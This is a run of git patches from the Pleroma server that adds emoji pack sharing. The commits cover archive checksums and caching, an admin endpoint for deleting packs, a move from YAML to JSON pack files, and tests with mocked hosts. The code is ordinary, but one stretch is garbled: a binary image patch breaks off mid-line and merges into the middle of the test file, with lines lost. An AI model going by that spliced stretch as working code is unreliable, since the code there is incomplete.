"web_push_encryption": {:hex, :web_push_encryption, "0.2.1", "d42cecf73420d9dc0053ba3299cc8c8d6ff2be2487d67ca2a57265868e4d9a98", [:mix], [{:httpoison, "~> 1.0", [hex: :httpoison, repo: "hexpm", optional: false]}, {:jose, "~> 1.8", [hex: :jose, repo: "hexpm", optional: false]}, {:poison, "~> 3.0", [hex: :poison, repo: "hexpm", optional: false]}], "hexpm"},
"websocket_client": {:git, "https://github.com/jeremyong/websocket_client.git", "9a6f65d05ebf2725d62fb19262b21f1805a59fbf", []},
+ "yamerl": {:hex, :yamerl, "0.4.0", "ae215b1242810a9bc07716b88062f1bfe06f6bc7cf68372091f630baa536df79", [:rebar3], [], "hexpm"},
}
From 7fb7dd9e0e0135af467477a66692990bdaecdbe9 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Sun, 11 Aug 2019 23:24:23 +0300
Subject: [PATCH 135/272] Only find SHA256 for packs that are shared
---
.../web/emoji_api/emoji_api_controller.ex | 18 ++++++++++++------
1 file changed, 12 insertions(+), 6 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 7ef9b543d..915059783 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -36,13 +36,19 @@ def list_packs(conn, _params) do
|> Enum.map(fn {name, pack} ->
pack_path = Path.join(@emoji_dir_path, name)
- archive_for_sha = make_archive(name, pack, pack_path)
- archive_sha = :crypto.hash(:sha256, archive_for_sha) |> Base.encode16()
+ if can_download?(pack, pack_path) do
+ archive_for_sha = make_archive(name, pack, pack_path)
+ archive_sha = :crypto.hash(:sha256, archive_for_sha) |> Base.encode16()
- {name,
- pack
- |> put_in(["pack", "can-download"], can_download?(pack, pack_path))
- |> put_in(["pack", "download-sha256"], archive_sha)}
+ {name,
+ pack
+ |> put_in(["pack", "can-download"], true)
+ |> put_in(["pack", "download-sha256"], archive_sha)}
+ else
+ {name,
+ pack
+ |> put_in(["pack", "can-download"], false)}
+ end
end)
|> Enum.into(%{})
end
From 7e4c8b56eab0e92b98efbf27e373d68758de540f Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Mon, 12 Aug 2019 10:35:34 +0300
Subject: [PATCH 136/272] Add tests for emoji pack sharing
---
config/test.exs | 3 +-
.../instance_static/emoji/test_pack/blank.png | Bin 0 -> 95 bytes
test/instance_static/emoji/test_pack/pack.yml | 13 +++
.../emoji/test_pack_nonshared/pack.yml | 13 +++
test/web/emoji_api_controller_test.exs | 98 ++++++++++++++++++
5 files changed, 126 insertions(+), 1 deletion(-)
create mode 100644 test/instance_static/emoji/test_pack/blank.png
create mode 100644 test/instance_static/emoji/test_pack/pack.yml
create mode 100644 test/instance_static/emoji/test_pack_nonshared/pack.yml
create mode 100644 test/web/emoji_api_controller_test.exs
diff --git a/config/test.exs b/config/test.exs
index df512b5d7..da2778aa7 100644
--- a/config/test.exs
+++ b/config/test.exs
@@ -30,7 +30,8 @@
notify_email: "noreply@example.com",
skip_thread_containment: false,
federating: false,
- external_user_synchronization: false
+ external_user_synchronization: false,
+ static_dir: "test/instance_static/"
config :pleroma, :activitypub, sign_object_fetches: false
diff --git a/test/instance_static/emoji/test_pack/blank.png b/test/instance_static/emoji/test_pack/blank.png
new file mode 100644
index 0000000000000000000000000000000000000000..8f50fa02340e7e09e562f86e00b6e4bd6ad1d565
GIT binary patch
literal 95
zcmeAS@N?(olHy`uVBq!ia0vp^4Is=2Bp6=1#-sr$rjj7PU get(emoji_api_path(conn, :list_packs)) |> json_response(200)
+
+ assert Map.has_key?(resp, "test_pack")
+
+ pack = resp["test_pack"]
+
+ assert Map.has_key?(pack["pack"], "download-sha256")
+ assert pack["pack"]["can-download"]
+
+ assert pack["files"] == %{"blank" => "blank.png"}
+
+ # Non-shared pack
+
+ assert Map.has_key?(resp, "test_pack_nonshared")
+
+ pack = resp["test_pack_nonshared"]
+
+ refute pack["pack"]["shared"]
+ refute pack["pack"]["can-download"]
+ end
+
+ test "downloading a shared pack from download_shared" do
+ conn = build_conn()
+
+ resp =
+ conn
+ |> get(emoji_api_path(conn, :download_shared, "test_pack"))
+ |> response(200)
+
+ {:ok, arch} = :zip.unzip(resp, [:memory])
+
+ assert Enum.find(arch, fn {n, _} -> n == 'pack.yml' end)
+ assert Enum.find(arch, fn {n, _} -> n == 'blank.png' end)
+ end
+
+ test "downloading a shared pack from another instance via download_from" do
+ on_exit(fn ->
+ File.rm_rf!("test/instance_static/emoji/test_pack2")
+ end)
+
+ mock(fn
+ %{
+ method: :get,
+ url: "https://example.com/api/pleroma/emoji/packs/list"
+ } ->
+ conn = build_conn()
+
+ conn
+ |> get(emoji_api_path(conn, :list_packs))
+ |> json_response(200)
+ |> json()
+
+ %{
+ method: :get,
+ url: "https://example.com/api/pleroma/emoji/packs/download_shared/test_pack"
+ } ->
+ conn = build_conn()
+
+ conn
+ |> get(emoji_api_path(conn, :download_shared, "test_pack"))
+ |> response(200)
+ |> text()
+ end)
+
+ admin = insert(:user, info: %{is_admin: true})
+
+ conn = build_conn()
+
+ assert conn
+ |> put_req_header("content-type", "application/json")
+ |> assign(:user, admin)
+ |> post(
+ emoji_api_path(
+ conn,
+ :download_from
+ ),
+ %{
+ instance_address: "https://example.com",
+ pack_name: "test_pack",
+ as: "test_pack2"
+ }
+ |> Jason.encode!()
+ )
+ |> text_response(200) == "ok"
+
+ assert File.exists?("test/instance_static/emoji/test_pack2/pack.yml")
+ assert File.exists?("test/instance_static/emoji/test_pack2/blank.png")
+ end
+end
From ee620ecbf11398277551ef603355a56a53690461 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Mon, 12 Aug 2019 13:13:01 +0300
Subject: [PATCH 137/272] Add caching for emoji pack sharing
---
config/config.exs | 3 +-
docs/config.md | 2 +
lib/pleroma/application.ex | 6 ++-
.../web/emoji_api/emoji_api_controller.ex | 42 ++++++++++++++++++-
4 files changed, 50 insertions(+), 3 deletions(-)
diff --git a/config/config.exs b/config/config.exs
index c7e0cf09f..4c758d4a0 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -122,7 +122,8 @@
# Put groups that have higher priority than defaults here. Example in `docs/config/custom_emoji.md`
Custom: ["/emoji/*.png", "/emoji/**/*.png"]
],
- default_manifest: "https://git.pleroma.social/pleroma/emoji-index/raw/master/index.json"
+ default_manifest: "https://git.pleroma.social/pleroma/emoji-index/raw/master/index.json",
+ shared_pack_cache_seconds_per_file: 60
config :pleroma, :uri_schemes,
valid_schemes: [
diff --git a/docs/config.md b/docs/config.md
index 3f37fa561..1179def56 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -707,6 +707,8 @@ Configure OAuth 2 provider capabilities:
* `pack_extensions`: A list of file extensions for emojis, when no emoji.txt for a pack is present. Example `[".png", ".gif"]`
* `groups`: Emojis are ordered in groups (tags). This is an array of key-value pairs where the key is the groupname and the value the location or array of locations. `*` can be used as a wildcard. Example `[Custom: ["/emoji/*.png", "/emoji/custom/*.png"]]`
* `default_manifest`: Location of the JSON-manifest. This manifest contains information about the emoji-packs you can download. Currently only one manifest can be added (no arrays).
+* `shared_pack_cache_seconds_per_file`: When an emoji pack is shared, the archive is created and cached in
+ memory for this amount of seconds multiplied by the number of files.
## Database options
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index dabce771d..a339e2c48 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -102,10 +102,14 @@ defp cachex_children do
build_cachex("rich_media", default_ttl: :timer.minutes(120), limit: 5000),
build_cachex("scrubber", limit: 2500),
build_cachex("idempotency", expiration: idempotency_expiration(), limit: 2500),
- build_cachex("web_resp", limit: 2500)
+ build_cachex("web_resp", limit: 2500),
+ build_cachex("emoji_packs", expiration: emoji_packs_expiration(), limit: 10)
]
end
+ defp emoji_packs_expiration,
+ do: expiration(default: :timer.seconds(5 * 60), interval: :timer.seconds(60))
+
defp idempotency_expiration,
do: expiration(default: :timer.seconds(6 * 60 * 60), interval: :timer.seconds(60))
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 915059783..8219eaaa1 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -1,6 +1,8 @@
defmodule Pleroma.Web.EmojiAPI.EmojiAPIController do
use Pleroma.Web, :controller
+ require Logger
+
def reload(conn, _params) do
Pleroma.Emoji.reload()
@@ -12,6 +14,8 @@ def reload(conn, _params) do
"emoji"
)
+ @cache_seconds_per_file Pleroma.Config.get!([:emoji, :shared_pack_cache_seconds_per_file])
+
def list_packs(conn, _params) do
pack_infos =
case File.ls(@emoji_dir_path) do
@@ -66,13 +70,49 @@ defp can_download?(pack, pack_path) do
end)
end
- defp make_archive(name, pack, pack_dir) do
+ defp create_archive_and_cache(name, pack, pack_dir, md5) do
files =
['pack.yml'] ++
(pack["files"] |> Enum.map(fn {_, path} -> to_charlist(path) end))
{:ok, {_, zip_result}} = :zip.zip('#{name}.zip', files, [:memory, cwd: to_charlist(pack_dir)])
+ cache_ms = :timer.seconds(@cache_seconds_per_file * Enum.count(files))
+
+ Cachex.put!(
+ :emoji_packs_cache,
+ name,
+ # if pack.yml MD5 changes, the cache is not valid anymore
+ %{pack_yml_md5: md5, pack_data: zip_result},
+ # Add a minute to cache time for every file in the pack
+ ttl: cache_ms
+ )
+
+ Logger.debug("Create an archive for the '#{name}' shared emoji pack, \
+keeping it in cache for #{div(cache_ms, 1000)}s")
+
+ zip_result
+ end
+
+ defp make_archive(name, pack, pack_dir) do
+ # Having a different pack.yml md5 invalidates cache
+ pack_yml_md5 = :crypto.hash(:md5, File.read!(Path.join(pack_dir, "pack.yml")))
+
+ maybe_cached_pack = Cachex.get!(:emoji_packs_cache, name)
+
+ zip_result =
+ if is_nil(maybe_cached_pack) do
+ create_archive_and_cache(name, pack, pack_dir, pack_yml_md5)
+ else
+ if maybe_cached_pack[:pack_yml_md5] == pack_yml_md5 do
+ Logger.debug("Using cache for the '#{name}' shared emoji pack")
+
+ maybe_cached_pack[:pack_data]
+ else
+ create_archive_and_cache(name, pack, pack_dir, pack_yml_md5)
+ end
+ end
+
zip_result
end
From 7a0c755d0a69157868e245b35b48ed07a7dfd3c7 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Mon, 12 Aug 2019 16:43:28 +0300
Subject: [PATCH 138/272] Send ok for emoji reloading as text, not as json
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 8219eaaa1..72daccc8c 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -6,7 +6,7 @@ defmodule Pleroma.Web.EmojiAPI.EmojiAPIController do
def reload(conn, _params) do
Pleroma.Emoji.reload()
- conn |> json("ok")
+ conn |> text("ok")
end
@emoji_dir_path Path.join(
From 3a8669b48771ac4203b6abf2a372c6960d36345a Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Mon, 12 Aug 2019 17:35:25 +0300
Subject: [PATCH 139/272] Fix responses for emoji pack controlller
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 72daccc8c..f2b1e8a8d 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -88,7 +88,7 @@ defp create_archive_and_cache(name, pack, pack_dir, md5) do
ttl: cache_ms
)
- Logger.debug("Create an archive for the '#{name}' shared emoji pack, \
+ Logger.debug("Create an archive for the '#{name}' emoji pack, \
keeping it in cache for #{div(cache_ms, 1000)}s")
zip_result
@@ -132,14 +132,14 @@ def download_shared(conn, %{"name" => name}) do
{:error,
conn
|> put_status(:forbidden)
- |> json("Pack #{name} cannot be downloaded from this instance, either pack sharing\
+ |> text("Pack #{name} cannot be downloaded from this instance, either pack sharing\
was disabled for this pack or some files are missing")}
end
else
{:error,
conn
|> put_status(:not_found)
- |> json("Pack #{name} does not exist")}
+ |> text("Pack #{name} does not exist")}
end
end
@@ -169,7 +169,7 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
}}
true ->
- {:error, "The pack was not set as shared and the is no fallback url to download from"}
+ {:error, "The pack was not set as shared and there is no fallback src to download from"}
end
case pack_info_res do
From 2d4b8f3d20c4dbf60e52e95e77f2e77766974402 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Mon, 12 Aug 2019 18:03:59 +0300
Subject: [PATCH 140/272] Add an endpoint for deleting emoji packs
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 12 ++++++++++++
lib/pleroma/web/router.ex | 1 +
test/web/emoji_api_controller_test.exs | 9 ++++++++-
3 files changed, 21 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index f2b1e8a8d..49d970277 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -210,4 +210,16 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
conn |> put_status(:internal_server_error) |> text(e)
end
end
+
+ def delete(conn, %{"name" => name}) do
+ pack_dir = Path.join(@emoji_dir_path, name)
+
+ case File.rm_rf(pack_dir) do
+ {:ok, _} ->
+ conn |> text("ok")
+
+ {:error, _} ->
+ conn |> put_status(:internal_server_error) |> text("Couldn't delete the pack #{name}")
+ end
+ end
end
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 1c781d750..4df0ca3c3 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -218,6 +218,7 @@ defmodule Pleroma.Web.Router do
# Modifying packs
pipe_through([:admin_api, :oauth_write])
+ delete("/delete/:name", EmojiAPIController, :delete)
post("/download_from", EmojiAPIController, :download_from)
end
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index c037883ee..13a34d38d 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -42,7 +42,7 @@ test "downloading a shared pack from download_shared" do
assert Enum.find(arch, fn {n, _} -> n == 'blank.png' end)
end
- test "downloading a shared pack from another instance via download_from" do
+ test "downloading a shared pack from another instance via download_from, deleting it" do
on_exit(fn ->
File.rm_rf!("test/instance_static/emoji/test_pack2")
end)
@@ -94,5 +94,12 @@ test "downloading a shared pack from another instance via download_from" do
assert File.exists?("test/instance_static/emoji/test_pack2/pack.yml")
assert File.exists?("test/instance_static/emoji/test_pack2/blank.png")
+
+ assert conn
+ |> assign(:user, admin)
+ |> delete(emoji_api_path(conn, :delete, "test_pack2"))
+ |> response(200) == "ok"
+
+ refute File.exists?("test/instance_static/emoji/test_pack2")
end
end
From b0ecd412f5c499773cdc462c50d6c8104a819550 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Mon, 12 Aug 2019 18:28:05 +0300
Subject: [PATCH 141/272] Clean out old emojis on reload
---
lib/pleroma/emoji.ex | 3 +++
1 file changed, 3 insertions(+)
diff --git a/lib/pleroma/emoji.ex b/lib/pleroma/emoji.ex
index 2a9f5f804..f56b26da2 100644
--- a/lib/pleroma/emoji.ex
+++ b/lib/pleroma/emoji.ex
@@ -122,6 +122,9 @@ defp load do
fn pack -> load_pack(Path.join(emoji_dir_path, pack), emoji_groups) end
)
+ # Clear out old emojis
+ :ets.delete_all_objects(@ets)
+
true = :ets.insert(@ets, emojis)
end
From 2a94eca096f67a908410ffdd82f5bace8a3df88c Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Thu, 15 Aug 2019 11:39:39 +0300
Subject: [PATCH 142/272] Change YAML to JSON
---
lib/pleroma/emoji.ex | 8 ++--
.../web/emoji_api/emoji_api_controller.ex | 40 +++++++++----------
mix.exs | 1 -
mix.lock | 1 -
.../instance_static/emoji/test_pack/pack.json | 16 ++++++++
test/instance_static/emoji/test_pack/pack.yml | 13 ------
.../emoji/test_pack_nonshared/pack.json | 16 ++++++++
.../emoji/test_pack_nonshared/pack.yml | 13 ------
test/web/emoji_api_controller_test.exs | 4 +-
9 files changed, 58 insertions(+), 54 deletions(-)
create mode 100644 test/instance_static/emoji/test_pack/pack.json
delete mode 100644 test/instance_static/emoji/test_pack/pack.yml
create mode 100644 test/instance_static/emoji/test_pack_nonshared/pack.json
delete mode 100644 test/instance_static/emoji/test_pack_nonshared/pack.yml
diff --git a/lib/pleroma/emoji.ex b/lib/pleroma/emoji.ex
index f56b26da2..170a7d098 100644
--- a/lib/pleroma/emoji.ex
+++ b/lib/pleroma/emoji.ex
@@ -146,12 +146,12 @@ defp load do
defp load_pack(pack_dir, emoji_groups) do
pack_name = Path.basename(pack_dir)
- pack_yaml = Path.join(pack_dir, "pack.yml")
+ pack_file = Path.join(pack_dir, "pack.json")
- if File.exists?(pack_yaml) do
- yaml = RelaxYaml.Decoder.read_from_file(pack_yaml)
+ if File.exists?(pack_file) do
+ contents = Jason.decode!(File.read!(pack_file))
- yaml["files"]
+ contents["files"]
|> Enum.map(fn {name, rel_file} ->
filename = Path.join("/emoji/#{pack_name}", rel_file)
{name, filename, pack_name}
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 49d970277..aedc70372 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -26,14 +26,14 @@ def list_packs(conn, _params) do
results
|> Enum.filter(fn file ->
dir_path = Path.join(@emoji_dir_path, file)
- # Filter to only use the pack.yml packs
- File.dir?(dir_path) and File.exists?(Path.join(dir_path, "pack.yml"))
+ # Filter to only use the pack.json packs
+ File.dir?(dir_path) and File.exists?(Path.join(dir_path, "pack.json"))
end)
|> Enum.map(fn pack_name ->
pack_path = Path.join(@emoji_dir_path, pack_name)
- pack_file = Path.join(pack_path, "pack.yml")
+ pack_file = Path.join(pack_path, "pack.json")
- {pack_name, RelaxYaml.Decoder.read_from_file(pack_file)}
+ {pack_name, Jason.decode!(File.read!(pack_file))}
end)
# Transform into a map of pack-name => pack-data
# Check if all the files are in place and can be sent
@@ -72,7 +72,7 @@ defp can_download?(pack, pack_path) do
defp create_archive_and_cache(name, pack, pack_dir, md5) do
files =
- ['pack.yml'] ++
+ ['pack.json'] ++
(pack["files"] |> Enum.map(fn {_, path} -> to_charlist(path) end))
{:ok, {_, zip_result}} = :zip.zip('#{name}.zip', files, [:memory, cwd: to_charlist(pack_dir)])
@@ -82,8 +82,8 @@ defp create_archive_and_cache(name, pack, pack_dir, md5) do
Cachex.put!(
:emoji_packs_cache,
name,
- # if pack.yml MD5 changes, the cache is not valid anymore
- %{pack_yml_md5: md5, pack_data: zip_result},
+ # if pack.json MD5 changes, the cache is not valid anymore
+ %{pack_json_md5: md5, pack_data: zip_result},
# Add a minute to cache time for every file in the pack
ttl: cache_ms
)
@@ -95,21 +95,21 @@ defp create_archive_and_cache(name, pack, pack_dir, md5) do
end
defp make_archive(name, pack, pack_dir) do
- # Having a different pack.yml md5 invalidates cache
- pack_yml_md5 = :crypto.hash(:md5, File.read!(Path.join(pack_dir, "pack.yml")))
+ # Having a different pack.json md5 invalidates cache
+ pack_file_md5 = :crypto.hash(:md5, File.read!(Path.join(pack_dir, "pack.json")))
maybe_cached_pack = Cachex.get!(:emoji_packs_cache, name)
zip_result =
if is_nil(maybe_cached_pack) do
- create_archive_and_cache(name, pack, pack_dir, pack_yml_md5)
+ create_archive_and_cache(name, pack, pack_dir, pack_file_md5)
else
- if maybe_cached_pack[:pack_yml_md5] == pack_yml_md5 do
+ if maybe_cached_pack[:pack_file_md5] == pack_file_md5 do
Logger.debug("Using cache for the '#{name}' shared emoji pack")
maybe_cached_pack[:pack_data]
else
- create_archive_and_cache(name, pack, pack_dir, pack_yml_md5)
+ create_archive_and_cache(name, pack, pack_dir, pack_file_md5)
end
end
@@ -118,10 +118,10 @@ defp make_archive(name, pack, pack_dir) do
def download_shared(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
- pack_yaml = Path.join(pack_dir, "pack.yml")
+ pack_file = Path.join(pack_dir, "pack.json")
- if File.exists?(pack_yaml) do
- pack = RelaxYaml.Decoder.read_from_file(pack_yaml)
+ if File.exists?(pack_file) do
+ pack = Jason.decode!(File.read!(pack_file))
if can_download?(pack, pack_dir) do
zip_result = make_archive(name, pack, pack_dir)
@@ -185,17 +185,17 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
File.mkdir_p!(pack_dir)
files =
- ['pack.yml'] ++
+ ['pack.json'] ++
(pfiles |> Enum.map(fn {_, path} -> to_charlist(path) end))
{:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
- # Fallback URL might not contain a pack.yml file. Put on we have if there's none
+ # Fallback URL might not contain a pack.json file. Put on we have if there's none
if pinfo[:fallback] do
- yaml_path = Path.join(pack_dir, "pack.yml")
+ pack_file_path = Path.join(pack_dir, "pack.json")
- unless File.exists?(yaml_path) do
- File.write!(yaml_path, RelaxYaml.Encoder.encode(full_pack, []))
+ unless File.exists?(pack_file_path) do
+ File.write!(pack_file_path, Jason.encode!(full_pack))
end
end
diff --git a/mix.exs b/mix.exs
index e8356d564..f2635da24 100644
--- a/mix.exs
+++ b/mix.exs
@@ -157,7 +157,6 @@ defp deps do
{:ex_rated, "~> 1.3"},
{:ex_const, "~> 0.2"},
{:plug_static_index_html, "~> 1.0.0"},
- {:relax_yaml, "~> 0.1"},
{:excoveralls, "~> 0.11.1", only: :test},
{:mox, "~> 0.5", only: :test}
] ++ oauth_deps()
diff --git a/mix.lock b/mix.lock
index 8852b5f65..d27041b96 100644
--- a/mix.lock
+++ b/mix.lock
@@ -84,7 +84,6 @@
"quantum": {:hex, :quantum, "2.3.4", "72a0e8855e2adc101459eac8454787cb74ab4169de6ca50f670e72142d4960e9", [:mix], [{:calendar, "~> 0.17", [hex: :calendar, repo: "hexpm", optional: true]}, {:crontab, "~> 1.1", [hex: :crontab, repo: "hexpm", optional: false]}, {:gen_stage, "~> 0.12", [hex: :gen_stage, repo: "hexpm", optional: false]}, {:swarm, "~> 3.3", [hex: :swarm, repo: "hexpm", optional: false]}, {:timex, "~> 3.1", [hex: :timex, repo: "hexpm", optional: true]}], "hexpm"},
"ranch": {:hex, :ranch, "1.7.1", "6b1fab51b49196860b733a49c07604465a47bdb78aa10c1c16a3d199f7f8c881", [:rebar3], [], "hexpm"},
"recon": {:git, "https://github.com/ferd/recon.git", "75d70c7c08926d2f24f1ee6de14ee50fe8a52763", [tag: "2.4.0"]},
- "relax_yaml": {:hex, :relax_yaml, "0.1.4", "99e55ae80b3bd1135f4288e1ba77b816ad7de05bcb4618a1a9f983ce7c89ff32", [:mix], [{:yamerl, "~> 0.4.0", [hex: :yamerl, repo: "hexpm", optional: false]}], "hexpm"},
"ssl_verify_fun": {:hex, :ssl_verify_fun, "1.1.4", "f0eafff810d2041e93f915ef59899c923f4568f4585904d010387ed74988e77b", [:make, :mix, :rebar3], [], "hexpm"},
"swarm": {:hex, :swarm, "3.4.0", "64f8b30055d74640d2186c66354b33b999438692a91be275bb89cdc7e401f448", [:mix], [{:gen_state_machine, "~> 2.0", [hex: :gen_state_machine, repo: "hexpm", optional: false]}, {:libring, "~> 1.0", [hex: :libring, repo: "hexpm", optional: false]}], "hexpm"},
"sweet_xml": {:hex, :sweet_xml, "0.6.6", "fc3e91ec5dd7c787b6195757fbcf0abc670cee1e4172687b45183032221b66b8", [:mix], [], "hexpm"},
diff --git a/test/instance_static/emoji/test_pack/pack.json b/test/instance_static/emoji/test_pack/pack.json
new file mode 100644
index 000000000..1b260f0f7
--- /dev/null
+++ b/test/instance_static/emoji/test_pack/pack.json
@@ -0,0 +1,16 @@
+{
+ "pack": {
+ "license": "Test license",
+ "homepage": "https://pleroma.social",
+ "description": "Test description",
+
+ "fallblack-src": "https://example.com",
+ "fallback-src-sha256": "65CDCCBCA9388A68023519F997367783BE69ED42864398CAC568E56F65CE0E75",
+
+ "share-files": true
+ },
+
+ "files": {
+ "blank": "blank.png"
+ }
+}
diff --git a/test/instance_static/emoji/test_pack/pack.yml b/test/instance_static/emoji/test_pack/pack.yml
deleted file mode 100644
index 851b06d17..000000000
--- a/test/instance_static/emoji/test_pack/pack.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-pack:
- license: Test license
- homepage: https://pleroma.social
- description: Test description
-
- fallblack-src: https://example.com
- # SHA256 of the fallback-src
- fallback-src-sha256: 65CDCCBCA9388A68023519F997367783BE69ED42864398CAC568E56F65CE0E75
-
- share-files: true
-
-files:
- blank: blank.png
diff --git a/test/instance_static/emoji/test_pack_nonshared/pack.json b/test/instance_static/emoji/test_pack_nonshared/pack.json
new file mode 100644
index 000000000..b49b1efe7
--- /dev/null
+++ b/test/instance_static/emoji/test_pack_nonshared/pack.json
@@ -0,0 +1,16 @@
+{
+ "pack": {
+ "license": "Test license",
+ "homepage": "https://pleroma.social",
+ "description": "Test description",
+
+ "fallblack-src": "https://example.com",
+ "fallback-src-sha256": "65CDCCBCA9388A68023519F997367783BE69ED42864398CAC568E56F65CE0E75",
+
+ "share-files": false
+ },
+
+ "files": {
+ "blank": "blank.png"
+ }
+}
diff --git a/test/instance_static/emoji/test_pack_nonshared/pack.yml b/test/instance_static/emoji/test_pack_nonshared/pack.yml
deleted file mode 100644
index 45c340415..000000000
--- a/test/instance_static/emoji/test_pack_nonshared/pack.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-pack:
- license: Test license
- homepage: https://pleroma.social
- description: Test description
-
- fallblack-src: https://example.com
- # SHA256 of the fallback-src
- fallback-src-sha256: 65CDCCBCA9388A68023519F997367783BE69ED42864398CAC568E56F65CE0E75
-
- share-files: false
-
-files:
- blank: blank.png
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index 13a34d38d..bf56c1516 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -38,7 +38,7 @@ test "downloading a shared pack from download_shared" do
{:ok, arch} = :zip.unzip(resp, [:memory])
- assert Enum.find(arch, fn {n, _} -> n == 'pack.yml' end)
+ assert Enum.find(arch, fn {n, _} -> n == 'pack.json' end)
assert Enum.find(arch, fn {n, _} -> n == 'blank.png' end)
end
@@ -92,7 +92,7 @@ test "downloading a shared pack from another instance via download_from, deletin
)
|> text_response(200) == "ok"
- assert File.exists?("test/instance_static/emoji/test_pack2/pack.yml")
+ assert File.exists?("test/instance_static/emoji/test_pack2/pack.json")
assert File.exists?("test/instance_static/emoji/test_pack2/blank.png")
assert conn
From b78973d27f0c9225104914c79cf93bf3589fe7cc Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Thu, 15 Aug 2019 11:46:03 +0300
Subject: [PATCH 143/272] fallback can't have pack.json, reflect that in code
having pacj.json and sha256 in a fallback pack would cause a circular dependency of itself
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index aedc70372..3b9eab8b8 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -184,19 +184,19 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
pack_dir = Path.join(@emoji_dir_path, local_name)
File.mkdir_p!(pack_dir)
+ # Fallback cannot contain a pack.json file
files =
- ['pack.json'] ++
+ unless(pinfo[:fallback], do: ['pack.json'], else: []) ++
(pfiles |> Enum.map(fn {_, path} -> to_charlist(path) end))
{:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
- # Fallback URL might not contain a pack.json file. Put on we have if there's none
+ # Fallback can't contain a pack.json file, since that would cause the fallback-src-sha256
+ # in it to depend on itself
if pinfo[:fallback] do
pack_file_path = Path.join(pack_dir, "pack.json")
- unless File.exists?(pack_file_path) do
- File.write!(pack_file_path, Jason.encode!(full_pack))
- end
+ File.write!(pack_file_path, Jason.encode!(full_pack))
end
conn |> text("ok")
From adf31d596e77ef71e2ffe80d9dc41988f6c1cfb5 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Thu, 15 Aug 2019 12:07:51 +0300
Subject: [PATCH 144/272] Add tests for downloading from fallback url
---
.../emoji/test_pack_nonshared/nonshared.zip | Bin 0 -> 256 bytes
.../emoji/test_pack_nonshared/pack.json | 4 +-
test/web/emoji_api_controller_test.exs | 40 +++++++++++++++++-
3 files changed, 41 insertions(+), 3 deletions(-)
create mode 100644 test/instance_static/emoji/test_pack_nonshared/nonshared.zip
diff --git a/test/instance_static/emoji/test_pack_nonshared/nonshared.zip b/test/instance_static/emoji/test_pack_nonshared/nonshared.zip
new file mode 100644
index 0000000000000000000000000000000000000000..148446c642ea24b494bc3e25ccd772faaf2f2a13
